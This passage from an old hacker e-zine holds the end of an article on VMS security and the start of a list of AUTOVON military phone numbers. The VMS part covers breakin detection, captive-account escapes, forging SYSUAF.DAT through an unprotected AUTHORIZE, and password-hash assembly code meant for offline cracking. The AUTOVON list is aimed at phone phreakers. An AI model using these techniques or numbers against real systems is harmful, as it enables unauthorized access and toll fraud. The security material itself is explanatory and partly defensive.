  879. set the Baud rate, if AutoBaud is enabled). 
  880.  
  881. If a System Password has been set on the port, VMS will BEEP after the
  882. first <CR>, and will then seem to be dead. Only after the correct System
  883. Password has been entered will the Username: prompt be given.
  884. [more]       
  885. VMS gives no indication of whether a correct username has been entered: it
  886. always asks for a Password:. VMS passwords can be like any other passwords,
  887. or they may be generated nonsense words. The /GENERATE_PASSWORD qualifier
  888. may be placed on user accounts by the system manager, forcing them to
  889. select from lists of supposedly easy to remember but nonsensical
  890. passwords. 
  891.  
  892. The system manager may also enforce a minimum password length and can even
  893. impose dual passwords on accounts. If a Username with dual passwords is
  894. entered, the system will prompt for Password: twice in a row. Automatic
  895. Password expiration dates can be set, forcing users to change their
  896. passwords every so often: from once a day to once a year or never.
  897.  
  898. After the Username and Password have been entered, the system will either
  899. log the user in, or will print the familiar message,
  900.  
  901.      User Authorization Failure
  902.  
  903. and will hang up after a settable number of failures (the default is 3) if
  904. the port characteristics include DIALUP and HANGUP.
  905. [more]       
  906.  
  907. Breakin Detection:
  908. -----------------
  909. If a hacker were trying to get into the system he could just continue to
  910. dialup and try again. But VMS has some features to discourage this too. 
  911.  
  912. If breakin detection and evasion is enabled, VMS will start to get cagey.
  913. If the count of login failures from a specific source gets high enough, the
  914. system assumes a break-in is in progress. Only login failures caused by
  915. invalid Passwords are counted, NOT invalid usernames. And the attempts must
  916. be coming from one of these three sources:
  917.  
  918.      .    A specific valid Username, and (if setup this way, A specific
  919.           terminal. 
  920.      .    A specific remote DECnet node and remote Username.
  921.      .    The Username of the creator of a detached process.
  922.  
  923. By default, VMS allows five failed login attempts from any one source
  924. within the time period specified. But it's not as simple as that! 
  925.  
  926. [more]       Each time a failure occurs, time is added to the time period in which a
  927. certain number of failures can occur. To take an example from DEC: 
  928.  
  929.      Assume the default values are in effect. LGI_BRK_LIM specifies no
  930.      more than five login failures from one source. LGI_BRK_TMO is set
  931.      for five minutes. Assume that an outsider starts sending user
  932.      names and passwords to the system. When the first password fails,
  933.      the clock starts to run and the user has four more tries in the
  934.      next five minutes. When the second attempt fails about 30 seconds
  935.      later, the user has three tries left that will be counted over
  936.      the next 9.5 minutes. When the third attempt fails 30 seconds
  937.      later, the login failure observation time has reached 22.5
  938.      minutes. As a result, the next login failure from that source
  939.      within 22.4 minutes will trigger evasive action. The system
  940.      tolerates an average rate of login failures that is the
  941.      reciprocal of the parameter LGI_BRK_TMO...
  942.  
  943.  
  944. When breakin evasion is triggered, the system will give a:
  945.      User Authorization Failure
  946. message even when a valid Username and Password are entered, giving no
  947. [more]       indication of what it is doing. Note that ONLY the Username(s) in question
  948. are treated this way: other Usernames can still log in from the same
  949. terminal even if terminal-specific breakin detection is enabled. 
  950.  
  951. The length of time VMS will hide in this way is controlled by the sysgen
  952. parameter LGI_HID_TIM. But VMS doesn't hide for exactly this time. Rather,
  953. it will hide for a length of time determined by the following equation:
  954.  
  955.      Evasion time = LGI_HID_TIM * (random number between 1 and 1.5)
  956.  
  957. The parameter LGI_BRK_DISUSER can be set, and will tell VMS to permanently
  958. disable accounts rather than just hiding for a time. The system manager
  959. then has to re-enable them manually. This is a dangerous parameter to set,
  960. however, because malicious individuals could deliberately disable accounts
  961. then! If the SYSTEM account is disabled this way, it will only be allowed
  962. to login on the VAX system console.
  963.  
  964.  
  965. Security Alarms:
  966. ----------------
  967. Although breakin attempts to different Usernames don't activate VMS Breakin
  968. [more]       detection, they can trigger Security Alarms. Security Alarms can also be
  969. triggered by different types of access to specific files or memory areas.
  970. Security Alarms cause messages to be displayed on the system console, on
  971. the terminals of any user enabled as Security Operator, and in the Operator
  972. Log file.
  973.  
  974. As DEC says, 
  975.      Because security auditing affects system performance, enable
  976.      security alarms only for the most important events.
  977. Damn right! If all security alarms are enabled the system will hang! It
  978. starts writing alarms about the fact it is writing alarms, ad infinitum....
  979.  
  980. Security alarms can be triggered on multiple login failures, on breakin, on
  981. successful login from given ports, on failed attempts to access files, on
  982. successful attempts to access files, etc. So even if you get privilege to
  983. override protection or to defeat it a security alarm may still be
  984. triggered.
  985.  
  986. Security alarms typically might be enabled on the AUTHORIZE program, which
  987. adds and modifies user accounts, on SYSUAF.DAT, the authorization database,
  988. on RIGHTSLIST.DAT, the access rights database, etc. and on critical
  989. [more]       database files. But many sites don't bother with them because of their
  990. inconvenience.
  991.  
  992. Accounting:
  993. ----------
  994. Besides Security Alarms, Accounting can be enabled. Accounting can show
  995. successful logins, login failures, how much resources are consumed by
  996. processes, what programs are executed, etc. Not all sites enable
  997. accounting, and not all sites enable the same amount of it. Accounting
  998. records show login failures but only show the username that attempted to
  999. login if it is a valid username. 
  1000.  
  1001.  
  1002.  
  1003. File and Device Protection:
  1004. ==========================
  1005.  
  1006. UIC:
  1007. ----
  1008. The primary access protection mechanism is the UIC. This consists of a
  1009. Group and a User code, numerically represented as [nnn,nnn]. It is an Octal
  1010. [more]       number. Since VMS 4.x versions the UIC can also be expressed as [name] or
  1011. [name,name], but internally this is translated back to the old format.
  1012.  
  1013. Users, processes, files, devices, memory sections, etc. all have UICs.
  1014. Files, devices, memory sections, etc. can have access by System, Owner,
  1015. Group and World, any combination of Read, Write, Execute, Delete for each
  1016. category. 
  1017.      System    are the system accounts.
  1018.      Owner     is the account(s) who's UIC is the same as that on the 
  1019.                object (file, device, etc.). 
  1020.      Group     are accounts with the same first UIC number.
  1021.      World     is everyone.
  1022.  
  1023. So a process with UIC [23,7] could access an object with UIC [23,4] if that
  1024. object allowed access by Group or World. The process could access an object
  1025. with UIC [25,3] only if World access was allowed, and could access objects
  1026. with UIC [23,7] if Owner, Group, or World was allowed.
  1027.  
  1028. ACL:
  1029. ----
  1030. Also, there's a protection mechanism called the ACL or Access Control List.
  1031. [more]       This is in addition to, and can override UIC protection. With ACLs an
  1032. Identifier is created, like MODEM for one or more modem ports. An ACL is
  1033. created on the port(s) desired, and in the ACL are multiple Access Control
  1034. Entries (ACEs). If one of them is:
  1035.      (Identifier=MODEM, Access=Read+Write)
  1036. for example, user who has been Granted the identifier MODEM can access
  1037. those ports. These access privileges, like UICs apply to processes in
  1038. general. Granting and managing Identifiers is done in the AUTHORIZE
  1039. program.
  1040.  
  1041.  
  1042.  
  1043. Loopholes, Ways of Defeating Security...
  1044. ========================================
  1045.  
  1046. Although VMS has great security it's often applied poorly. For one thing,
  1047. protection is often not set up properly, programs are installed with too
  1048. much privilege etc. (Programs can be installed so they have privilege when
  1049. run even if the user running them has no privilege).
  1050.  
  1051. Getting a $ prompt:
  1052. [more]       -------------------
  1053. If a hacker logs into a VMS system and finds himself trapped within
  1054. application programs the first thing he will want to do is to get out to
  1055. the normal DCL command mode from where more things can be done. 
  1056.  
  1057. Hackers will try several things and you should check to make sure they
  1058. can't try these tricks on your system.
  1059.  
  1060. AllInOne:
  1061.  
  1062. In AllInOne, DEC's popular Electronic Mail and menuing Office Automation
  1063. system, typing 
  1064.      $
  1065. (the dollar sign) will by default take the user to DCL level.
  1066. Typing 
  1067.      ADMIN 
  1068. will get the user into the AllInOne administrator menu. From there they can
  1069. create accounts with $ access.
  1070.  
  1071. AllInOne mail also has a feature where macros can be attached to mail and
  1072. executed when the mail is read. If the hacker sends a message of this type
  1073. [more]       to some user with privilege, the macro can go off in the background and
  1074. create accounts, etc. for the hacker. This feature should be disabled.
  1075.  
  1076.  
  1077. Other Captive Account tricks:
  1078.  
  1079. Holding down <Ctrl-Y> and letting it repeat for a while will often cause
  1080. accounts that are trapped in a command procedure but not marked as CAPTIVE
  1081. in the UAF to exit from the command procedure to DCL. 
  1082.  
  1083. If an account has access to VAXMAIL (the MAIL command) it can often use
  1084. MAIL's SPAWN command to spawn a process with DCL access.
  1085.  
  1086. The TPU editor has a similar SPAWN command.
  1087.  
  1088. If an account is not marked CAPTIVE the user can try to add /NOCOMMAND
  1089. after the username, like the following:
  1090.  
  1091.      Username: fred/nocommand
  1092.  
  1093. This will cause the command procedure to not be executed, leaving the
  1094. [more]       hacker at a DCL $ prompt.
  1095.  
  1096. There are many more too.
  1097.  
  1098. For this reason you should mark all accounts that are supposed to be
  1099. captive as CAPTIVE using the AUTHORIZE utility.
  1100.  
  1101.  
  1102. When at the $ Prompt:
  1103. ---------------------
  1104. Since protection is often set incorrectly, hackers can take advantage and
  1105. use this to bypass security. A couple of examples will serve to show that
  1106. you must be diligent in setting the protections properly on systems you
  1107. manage.
  1108.  
  1109. If SYS$SYSTEM:AUTHORIZE.EXE is not protected, it can be run by non-
  1110. privileged users. The hacker would then run AUTHORIZE and create a new
  1111. SYSUAF.DAT file in his own directory (AUTHORIZE will do this by default if
  1112. not run in the SYS$SYSTEM directory). The hacker would add a privileged
  1113. username to the new SYSUAF.DAT, copy it back to SYS$SYSTEM:, log out, log
  1114. in again as the new privileged user, and quickly delete the new SYSUAF.DAT
  1115. [more]       so that other users don't get "Authorization Failure" messages. The hacker
  1116. would then be able to add privileged accounts to SYSUAF.DAT at his leisure.
  1117.  
  1118. Another clever idea would be for the hacker who has gained access to copy
  1119. SYSUAF.DAT to another directory and then try to find out what passwords are
  1120. in it. VMS uses a one-way encryption algorithm, but a gifted hacker will
  1121. use the same algorithm to repeatedly encrypt different passwords until he
  1122. finds ones that match. A copy of the VMS assembly language code to do this
  1123. encryption can be found in the appendix, for your information. 
  1124.  
  1125. Again, setting the protection properly will keep this from happening to
  1126. your system!
  1127.  
  1128.  
  1129. Conclusion:
  1130. ===========
  1131.  
  1132. This has been a brief overview of VMS security. For more information, read
  1133. your DEC manuals. A good place to start is the handy VMS System Manager's
  1134. Manual, Order Number AA-LA00A-TE, which can be obtained from DEC Direct and
  1135. should have come with your VMS update.
  1136. [more]       
  1137. The importance of proper security cannot be over emphasized, but if you
  1138. overdo it performance will suffer. Experiment on your system to find a good
  1139. balance. Don't ignore security or you may regret it rather intensely.
  1140.  
  1141. Appendix -- VMS assembly code for encrypting passwords:
  1142. =======================================================
  1143.  
  1144. .TITLE HPWD - hash user password
  1145. .IDENT 'V02-002'
  1146. ; Hash PassWorD:
  1147. ; Hash a password irreversibly. This is one way encryption with 
  1148. ; no decryption possible.
  1149.  
  1150. ; This code was obtained by disassembling the AUTHORIZE program.
  1151. ; See the VMS microfiche for the fully commented code:
  1152. ;         e _lib$code:_lib$code+68
  1153.  
  1154. ; Input Parameters: 
  1155. ;      PWDDSC    - Address of password descriptor
  1156. ;      ENCRYPT - Encryption algorithm index (byte)
  1157. [more]       ;      SALT         - Random number (word)
  1158. ;      USRDSC  - Address of username descriptor
  1159.  
  1160. ; Output Parameters:  
  1161. ;      OUTDSC    - Address of encrypted output descriptor
  1162.  
  1163. OUTDSC=4
  1164. PWDDSC=OUTDSC+4
  1165. ENCRYPT=PWDDSC+4
  1166. SALT=ENCRYPT+4
  1167. USRDSC=SALT+4
  1168.  
  1169. .PSECT _LIB$CODE    RD,NOWRT,PIC,SHR,BYTE,EXE
  1170.  
  1171. ;  AUTODIN-II polynomial table used by CRC algorithm
  1172. AUTODIN:
  1173.      .LONG ^X000000000,^X01DB71064,^X03B6E20C8,^X026D930AC,^X076DC4190
  1174.      .LONG ^X06B6B51F4,^X04DB26158,^X05005713C,^X0EDB88320,^X0F00F9344
  1175.      .LONG ^X0D6D6A3E8,^X0CB61B38C,^X09B64C2B0,^X086D3D2D4,^X0A00AE278
  1176.      .LONG ^X0BDBDF21C
  1177.  
  1178. [more]       ; Purdy polynomial coefficients.  Prime, but don't need to be
  1179. Purdy_Poly:
  1180. c:
  1181.      .LONG -83,-1
  1182.      .LONG -179,-1
  1183.      .LONG -257,-1
  1184.      .LONG -323,-1
  1185.      .LONG -363,-1
  1186.  
  1187. .ENTRY    LGI$HPWD,^M<R2,R3,R4>
  1188.      MOVAQ   @outdsc(AP),R4
  1189.      MOVAQ   @4(R4),R4
  1190.      TSTB    encrypt(AP)
  1191.      BGTRU   10$
  1192.      MNEGL   #1,R0
  1193.      MOVAQ   @pwddsc(AP),R1
  1194.      CRC     autodin,R0,(R1),@4(R1)
  1195.      CLRL    R1
  1196.      MOVQ    R0,(R4)
  1197.      BRB     20$
  1198.  
  1199. [more]       10$: CLRQ    (R4)
  1200.      MOVAQ   @pwddsc(AP),R3
  1201.      BSBB    COLLAPSE_R2
  1202.      ADDW2   salt(AP),3(R4)
  1203.      MOVAQ   @usrdsc(AP),R3
  1204.      BSBB    COLLAPSE_R2
  1205.      PUSHAQ  (R4)
  1206.      CALLS   #1,PURDY
  1207.  
  1208. 20$: MOVL    #1,R0
  1209.      RET
  1210.  
  1211.  
  1212. COLLAPSE_R2:
  1213.      MOVZWL  (R3),R0
  1214.      BEQL    20$
  1215.      MOVAL   @4(R3),R2
  1216.      PUSHR   #^M<R1,R2>
  1217.      MOVL    R0,R1
  1218. 5$:  CMPB    (R2)+,#32
  1219.      BNEQ    7$
  1220. [more]            DECL    R1
  1221. 7$:  SOBGTR  R0,5$
  1222.      MOVL    R1,R0
  1223.      POPR    #^M<R1,R2>
  1224. 10$: BICL3   #-8,R0,R1
  1225.      ADDB2   (R2)+,(R4)[R1]
  1226.      SOBGTR  R0,10$
  1227. 20$: RSB
  1228.  
  1229. a=59
  1230. n0=1@24-3
  1231. n1=1@24-63
  1232.  
  1233.  
  1234. .ENTRY    PURDY,^M<r2,r3,r4,r5>
  1235.      MOVQ    @4(AP),-(SP)
  1236.      BSBW    PQMOD_R0
  1237.      MOVAQ   (SP),R4
  1238.      MOVAQ   PURDY_POLY,R5
  1239.      MOVQ    (R4),-(SP)
  1240.      PUSHL   #n1
  1241. [more]            BSBB    PQEXP_R3
  1242.      MOVQ    (R4),-(SP)
  1243.      PUSHL   #n0-n1
  1244.      BSBB    PQEXP_R3
  1245.      MOVQ    (R5)+,-(SP)
  1246.      BSBW    PQADD_R0
  1247.      BSBW    PQMUL_R2
  1248.      MOVQ    (R5)+,-(SP)
  1249.      MOVQ    (R4),-(SP)
  1250.      BSBW    PQMUL_R2
  1251.      MOVQ    (R5)+,-(SP)
  1252.      BSBW    PQADD_R0
  1253.      MOVQ    (R4),-(SP)
  1254.      BSBB    PQMUL_R2
  1255.      MOVQ    (R5)+,-(SP)
  1256.      BSBW    PQADD_R0
  1257.      MOVQ    (R4),-(SP)
  1258.      BSBB    PQMUL_R2
  1259.      MOVQ    (R5)+,-(SP)
  1260.      BSBW    PQADD_R0
  1261.      BSBW    PQADD_R0
  1262. [more]            MOVQ    (SP)+,@4(AP)
  1263.      MOVL    #1,R0
  1264.      RET
  1265.  
  1266. PQEXP_R3:
  1267.      POPR    #^M<r3>
  1268.      MOVQ    #1,-(SP)
  1269.      MOVQ    8+4(SP),-(SP)
  1270.      TSTL    8+8(SP)
  1271.      BEQL    30$
  1272. 10$: BLBC    8+8(SP),20$
  1273.      MOVQ    (SP),-(SP)
  1274.      MOVQ    8+8(SP),-(SP)
  1275.      BSBB    PQMUL_R2
  1276.      MOVQ    (SP)+,8(SP)
  1277.      CMPZV   #1,#31,8+8(SP),#0
  1278.      BEQL    30$
  1279. 20$: MOVQ    (SP),-(SP)
  1280.      BSBB    PQMUL_R2
  1281.      EXTZV   #1,#31,8+8(SP),8+8(SP)
  1282.      BRB     10$
  1283. [more]       
  1284. 30$: MOVQ    8(SP),8+8+4(SP)
  1285.      MOVAQ   8+8+4(SP),SP
  1286.      JMP     (R3)
  1287.  
  1288. u=0
  1289. v=u+4
  1290. y=u+8
  1291. z=y+4
  1292.  
  1293. PQMOD_R0:
  1294.      POPR    #^M<R0>
  1295.      CMPL    v(SP),#-1
  1296.      BLSSU   10$
  1297.      CMPL    u(SP),#-a
  1298.      BLSSU   10$
  1299.      ADDL2   #a,u(SP)
  1300.      ADWC    #0,v(SP)
  1301. 10$: JMP     (R0)
  1302.  
  1303. PQMUL_R2:
  1304. [more]            POPR    #^M<r1>
  1305.      MOVL    SP,R2
  1306.      PUSHL   z(R2)
  1307.      PUSHL   v(R2)
  1308.      BSBB    EMULQ
  1309.      BSBB    PQMOD_R0
  1310.      BSBB    PQLSH_R0
  1311.      PUSHL   y(R2)
  1312.      PUSHL   v(R2)
  1313.      BSBB    EMULQ
  1314.      BSBB    PQMOD_R0
  1315.      PUSHL   z(R2)
  1316.      PUSHL   u(R2)
  1317.      BSBB    EMULQ
  1318.      BSBB    PQMOD_R0
  1319.      BSBB    PQADD_R0
  1320.      BSBB    PQADD_R0
  1321.      BSBB    PQLSH_R0
  1322.      PUSHL   y(R2)
  1323.      PUSHL   u(R2)
  1324.      BSBB    EMULQ
  1325. [more]            BSBB    PQMOD_R0
  1326.      BSBB    PQADD_R0    
  1327.      MOVQ    (SP)+,Y(R2)
  1328.      MOVAQ   Y(R2),SP
  1329.      JMP     (R1)
  1330.  
  1331. EMULQ:
  1332.      EMUL    4(SP),8(SP),#0,-(SP)
  1333.      CLRL    -(SP)
  1334.      TSTL    4+8+4(SP)
  1335.      BGEQ    10$
  1336.      ADDL2   4+8+8(SP),(SP)
  1337. 10$: TSTL    4+8+8(SP)
  1338.      BGEQ    20$
  1339.      ADDL2   4+8+4(SP),(SP)
  1340. 20$: ADDL2   (SP)+,4(SP)
  1341.      MOVQ    (SP)+,4(SP)
  1342.      RSB     
  1343.  
  1344. PQLSH_R0:
  1345. .ENABLE LSB
  1346. [more]            POPR    #^M<r0>
  1347.      PUSHL   v(SP)
  1348.      PUSHL   #a
  1349.      BSBB    EMULQ
  1350.      ASHQ    #32,Y(SP),Y(SP)
  1351.      BRB     10$
  1352.  
  1353. PQADD_R0:
  1354.      POPR    #^M<R0>
  1355. 10$: ADDL2   u(SP),y(SP)
  1356.      ADWC    v(SP),z(SP)
  1357.      BLSSU   20$
  1358.      CMPL    z(SP),#-1
  1359.      BLSSU   30$
  1360.      CMPL    y(SP),#-a
  1361.      BLSSU   30$
  1362. 20$: ADDL2   #a,y(SP)
  1363.      ADWC    #0,z(SP)
  1364. 30$: MOVAQ   Y(SP),SP
  1365.      JMP     (R0)
  1366. .END
  1367. [more]       
  1368.  
  1369. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1370. =                 P/HUN Issue #3, Volume 2: Phile #4 of 11                    =
  1371. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1372.  
  1373.             The Automatic Voice Network (AUTOVON) Outline PART I
  1374.             ----------------------------------------------------
  1375.                            Typed by: DareDevil       
  1376.                            P/HUN Magazine Inc.                   
  1377.  
  1378. I am back from my long trip from London which turned out to be very intresting.
  1379. I met a couple of Hackers and Phreakers who were very willing to share 
  1380. information with me. From what they say Hacking European Computers seems to be
  1381. an easy task.                                                                  
  1382.  
  1383. Anyway.....
  1384. Heres something for you Silver Boxers. Hope this helps a little. The next 2   
  1385. parts will continue in the later issues of P/HUN. 
  1386.                
  1387.        o--------------------------------------------------------------o
  1388. [more]                   (To reach these installations from "DoD Numbers Only")
  1389.     
  1390.  
  1391.     AUTOVON Listing Information Dial "0"
  1392.     AUTOVON Access - Dail "8" Listen for the tone,then the AUTOVON Number 
  1393.     ---------------------------------------------------------------------
  1394.  
  1395.                         INCOMING AUTOVON CODES
  1396.                         ----------------------
  1397.  
  1398.   COMMERCIAL                  AUTOVON  |  COMMERCIAL               AUTOVON
  1399.   -------------------------------------|-------------------------------------
  1400.   227 Exchange    287 Plus four digits |  437 Exchange   364 Plus four digits
  1401.   238  "          251      "           |  475    "       335      "
  1402.   272  "          285      "           |  490    "       356      "
  1403.   274  "          284      "           |  576    "       291      "
  1404.   282  "          292      "           |  653    "       294      "
  1405.   284  "          251      "           |  692    "       222      "
  1406.   285  "          356      "           |  693    "       223      "
  1407.   295  "          295      "           |  694    "       224      " 
  1408.   325  "          221      "           |  695    "       225      "
  1409. [more]         355  "          345      "           |  696    "       226      "
  1410.   373  "          243      "           |  697    "       227      "
  1411.   394  "          290      "           |  746    "       286      "
  1412.   427  "          291      "           |  756    "       289      "
  1413.   433  "          288      "           |  763    "       293      " 
  1414.   463  "          296      "           |  767    "       297      "
  1415.   -------------------------------------+-------------------------------------
  1416.  
  1417. AUTOVON Access to The Pacific European-Carribean Area IS NOT available through
  1418. the DoD Exchanges. Theses calls must be placed through the appropriate Military
  1419. Switchboard serving your activity or by COML means.
  1420.  
  1421.                                 ALABAMA
  1422.                                 -------
  1423. Adj Gen Natl, Montgomery ........................................ 363-72XX
  1424.                                                        Oper Asst. 363-7210
  1425. Air Force Air Univ, Maxell AFB................................... 875-XXXX
  1426.                                                        Info Oper. 875-1110
  1427.                                                        Oper Asst. 436-3700
  1428. Air Natl Gd 117th Tac Recon Gp,Birmingham........................ 694-2XXX
  1429.                                                        Oper Asst. 694-2210
  1430. [more]                187th Tac Recon Gp, Montgomery.......................... 742-9XXX
  1431.                                                        Oper Asst. 485-9210
  1432.          232nd Mob Comm Sqd,  " ................................. 485-XXXX
  1433.                                                        Oper Asst. 742-9210
  1434. Anniston Army Depot.............................................. 571-XXXX
  1435.                                                        Oper Asst. 571-1110
  1436. Army Msl Cmd, Redstone Arsl...................................... 746-XXXX
  1437.                                                        Info Oper. 746-0011
  1438. Coast Guard Avn Spt Tng Cen, Mobile.............................. 436-3635
  1439. Def Contr Admin Svcs Mgt Area, Birmingham........................ 340-1XXX
  1440.                                                        Oper Asst. 340-1000
  1441. Fort McClellan, Anniston......................................... 865-XXXX
  1442.                                                        Oper Asst. 865-1110
  1443. Gunter AFB, Montgomery........................................... 446-XXXX
  1444.                                                        Oper Asst. 446-1110
  1445. Maxwell AFB, " .................................................. 875-XXXX
  1446.                                                        Info Oper. 875-1110
  1447. Mil Tfc Mgt Cmd (MTMC) EA Mob Det Gulf Outport Mobile............ 436-3830
  1448.  Outport Mobile.................................................. 746-XXXX
  1449. Redstone Arsl,HUntsville......................................... 746-XXXX
  1450.                                                        Info Oper. 746-XXXX
  1451. [more]       U.S Property & Fiscal Ofc (USPFO) Natl Gd, Montgomery............ 363-7316
  1452.  
  1453.                                   ALASKA
  1454.                                   ------
  1455.  
  1456. Adj Gen Natl Ge, Anchorage................................... 317-626-1299
  1457. Mil Actvities , Neklason Lake................................ 317-950-1211
  1458. Alaska Switch,Neklason Lake.................................. 317-950-1211
  1459. Cmdr in C Alaska (CINCAL), Elmendorf AFB..................... 317-552-3100
  1460.                                                   Oper Assit. 317-753-2228
  1461. Coast Guard COMCOGARD 17 Hq , Juneau......................... 317-388-7XXX
  1462.                                                   Oper Assit. 317-388-7011
  1463. Coast Guard Kodiak........................................... 317-487-5XXX
  1464.                                                   Oper Assit. 317-487-5888
  1465. Def Comm Agcy,Alaskan Region(DCA-AL) Elmendorf............... 317-552-XXXX
  1466.                                                   Oper Assit. 317-552-1110
  1467.       Commander.............................................. 317-943-1212
  1468.       Def Commercial Comm Ofc,Alaska,Elmendorf AFB........... 317-552-3132
  1469. Defense Fuel Region,Elmendorf AFB............................ 317-552-3760
  1470. Eielson AFB, Fairbanks....................................... 317-37X-XXXX
  1471.                                               Info Oper Only. 317-372-1191
  1472. [more]       Elmendorf AFB,Anchorage...................................... 317-552-XXXX
  1473.                                                         Info. 317-552-1110
  1474.                                                   Oper Assit. 317-552-1110
  1475. Fed Avn Agcy - Alaskan Rdn Hg, Anchorage..................... 317-552-XXXX
  1476.                                                   Oper Assit. 317-552-1110
  1477.      Comm Con Cen............................................ 317-552-1212
  1478. Fort Greely,Delta Junction................................... 317-87X-XXXX
  1479.                                                    Info Oper. 317-872-1113
  1480.                                                   Oper Assit. 317-864-0121
  1481. Fort Wainright, Fairbanks.................................... 317-35X-XXXX
  1482.                                                    Info Oper. 317-353-9113
  1483.                                                   Oper Assit. 317-353-9121
  1484. Nav Actvities,Adak........................................... 317-592-XXXX
  1485.                                                   Oper Assit. 317-592-0111
  1486. US Property & Fiscal Ofc (USPFO) Natl Gd, Ft Richardson...... 317-862-8116
  1487.  
  1488.  
  1489.                                  ARIZONA   
  1490.                                  ------- 
  1491.  
  1492. A Comm-Hq,Ft Huachuca........................................... 879-XXXX
  1493. [more]                                                            Oper Assit. 879-0111
  1494.     USACC HQS EAC............................................... 626-1720
  1495. Adj Gen Natl Gd, Phoenix........................................ 853-8710
  1496. Air Natl Gd 161st Mil Airlift Gp, Phoenix....................... 853-8710
  1497.                                                      Oper Assit. 853-9210
  1498. David Monthan AFB, Tucson....................................... 361-XXXX
  1499.                                                      Oper Assit. 361-1110
  1500.     Tac Cmd Post................................................ 626-1655
  1501. Def Contr Admin Svcs Mgt Area, Phoenix.......................... 940-XXXX
  1502.                                                      Oper Assit. 940-1110
  1503. Fort Huachuca, Sierra Vista..................................... 879-XXXX
  1504.                                                      Oper Assit. 879-0001
  1505. Luke AFB,Glendale............................................... 853-XXXX
  1506.                                                      Oper Assit. 853-1110
  1507.      Cmd Post Duty Officer...................................... 727-3950
  1508.                "          ...................................... 626-1690
  1509. Marine Corps Air Sta, Yuma...................................... 951-XXXX
  1510.                                                      Oper Assit. 951-3011
  1511. Mil Acft Star & Disp Cen,Tucson................................. 361-XXXX
  1512.                                                      Oper Assit. 361-1110
  1513. Natl Gd State Maint Ofc, Phoenix................................ 853-8810
  1514. [more]       US Property & Fiscal Ofc (USPFO) Natl Gd, Phoenix............... 853-8821
  1515. Williams AFB, Chandler.......................................... 474-XXXX
  1516.                                                      Oper Assit. 474-1011
  1517. Yuma Proving Grounds............................................ 899-XXXX
  1518.                                                      Oper Assit. 899-1110
  1519.                                                     After Hours. 899-2020
  1520. 1st Cbt Eval Gp Det 2 (SAC) Holbrook............................ 626-3430
  1521.  
  1522.  
  1523.                                 ARKANSAS
  1524.                                 --------
  1525.  
  1526. Adj Gen Natl Gd, Little Rock.................................... 731-5200
  1527. Air Natl Gd 188th Tac Recon Gp, Ft Smith........................ 962-8XXX
  1528. Blytheville AFB................................................. 721-XXXX
  1529.                                                      Oper Assit. 721-1110
  1530. Fort Chaffee,Ft Smith........................................... 962-2XXX
  1531.                                                      Oper Assit. 962-2111
  1532. Little Rock AFB................................................. 731-XXXX
  1533.                                                      Oper Assit. 731-1110
  1534. Pine Bluff Arsl................................................. 966-3XXX
  1535. [more]                                                            Oper Assit. 966-3798
  1536. US Property & Fiscal Ofc(USPFO) Natl Gd,Little Rock............. 731-5253
  1537.  
  1538.                               CALIFORNIA  
  1539.                               ----------
  1540.  
  1541. Adj Gen Natl Gd, Sacramento..................................... 466-6531
  1542. Air Force Aero Sta, McClelland AFB.............................. 730-3760
  1543. Air Force Contr Mgr Div AFSC, Los Angeles AFS................... 833-1837
  1544.                                                      Oper Assit. 833-1110
  1545. Air Force Flt Test Cen,AFSC, Edwards AFB........................ 527-XXXX
  1546.                                                      Oper Assit. 527-0111
  1547. Air Force Satl Comm Fac Hq, Los Angeles......................... 833-XXXX
  1548.                                                      Oper Assit. 833-1110
  1549. Air Force Satl Test Ctr, Sunnyvale.............................. 359-3XXX
  1550.                                                      Oper Assit. 359-3110
  1551.               144th Air Def Wg, Fresno.......................... 949-9XXX
  1552.                                                      Oper Assit. 949-9210
  1553.               146th Mil Airlift Wg, Van Nuys.................... 873-6XXX
  1554.                                                      Oper Assit. 873-6310
  1555.               148th Comm Sqd, Compton........................... 898-1895
  1556. [more]                     149th Comm Sqd, Highlands......................... 633-2582
  1557.               162nd Comm Gp, N Highlands........................ 633-2582
  1558.               216 Equip & Inst Squd, Hayward.................... 462-5637
  1559.               222nd Mob Comm Sqd, Costa Mesa.................... 833-0459
  1560.               234th Mob Comm Sqd, Hayward....................... 462-1746
  1561. America Forces Radio & TV Svc, Los Angeles...................... 898-1746
  1562. Armed Forces Reserve Ctr, Los Angeles........................... 972-8XXX
  1563.                                                      Oper Assit. 972-8011
  1564. Army Audit Agcy Western Region, Sacramento...................... 839-2241
  1565.                                                      Oper Assit. 839-1110
  1566. Ballistic Sys Div Af Sys Cmd, Norton AFB........................ 876-XXXX
  1567.                                                      Oper Assit. 876-1110
  1568. Beale AFB, Marsville............................................ 368-XXXX
  1569.                                                      Oper Assit. 368-1110
  1570. Camp Pendelton Marine Corps Base,Oceanside...................... 365-XXXX
  1571.                                                      Oper Assit. 365-0111
  1572. Castle AFB, Merced.............................................. 347-XXXX
  1573.                                                      Oper Assit. 347-1110
  1574. Centerville Beach Nav Fac, Ferndale............................. 896-3381
  1575. Coast Guard COMCOGARD 11 Hq, Long Beach......................... 360-7961
  1576.               12 Hq,(RCC Only), San Francisco................... 730-3471
  1577. [more]       Montery......................................................... 629-1561
  1578. Cmdr Submarine Flottilla Five, San Diego........................ 933-XXXX
  1579.                                                      Oper Assit. 933-1011
  1580. Def Conrt Admin Svcs Reg Svcs Reg/Mgt Area, Los Angeles......... 833-XXXX
  1581.                                                       Info Oper. 833-2226
  1582.                                                      Oper Assit. 833-1110
  1583. Def Contr Admin Svcs Mgt Area, Santa Ana........................ 873-2XXX
  1584.                                                      Oper Assit. 873-2700
  1585.              San Diego.......................................... 542-XXXX
  1586.                                                      Oper Assit. 524-0111
  1587.              Van Nuys........................................... 972-3XXX
  1588.                                                       Info Oper. 972-3319
  1589.              San Francisco...................................... 466-9XXX
  1590.                                                       Info Oper. 466-9500
  1591. Defense Depot, Tracy............................................ 462-9XXX 
  1592.                                                      Oper Assit. 462-9110
  1593. Def Fuel Region West San Pedro.................................. 833-2876 
  1594. Def Language Institute, Presidio of Monterey.................... 929-XXXX
  1595.                                                      Oper Assit. 929-1110
  1596. Def Pers Spt Cen, Alameda....................................... 686-3006
  1597. Def Manpower Data Center, Monterey.............................. 878-2951
  1598. [more]       Edwards AFB..................................................... 527-XXXX
  1599.                                                       Info Oper. 527-0111
  1600. FAA Los Angeles Air Rt Trc Con Cen, Palmdale.................... 898-1290
